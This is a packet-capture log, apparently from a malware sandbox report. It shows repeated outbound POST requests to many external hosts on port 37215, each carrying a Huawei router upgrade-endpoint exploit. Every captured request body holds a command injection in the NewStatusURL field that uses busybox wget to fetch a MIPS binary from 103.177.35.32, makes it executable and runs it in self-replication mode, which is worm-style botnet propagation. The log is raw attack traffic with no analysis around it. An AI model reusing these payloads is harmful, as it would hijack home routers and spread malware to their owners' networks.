                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3240192.168.2.2351548157.3.44.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.670711994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3241192.168.2.2355424157.185.184.25337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.670732021 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3242192.168.2.233668241.217.149.837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.673599958 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3243192.168.2.2359150173.66.10.7137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.673610926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3244192.168.2.234895441.213.157.23937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.673791885 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3245192.168.2.2342190157.148.101.937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.673808098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3246192.168.2.2344816197.83.243.16337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.673818111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3247192.168.2.2344524197.41.172.10837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.673844099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3248192.168.2.2336546157.229.60.8037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.673892975 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3249192.168.2.2340264197.209.24.1237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678132057 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
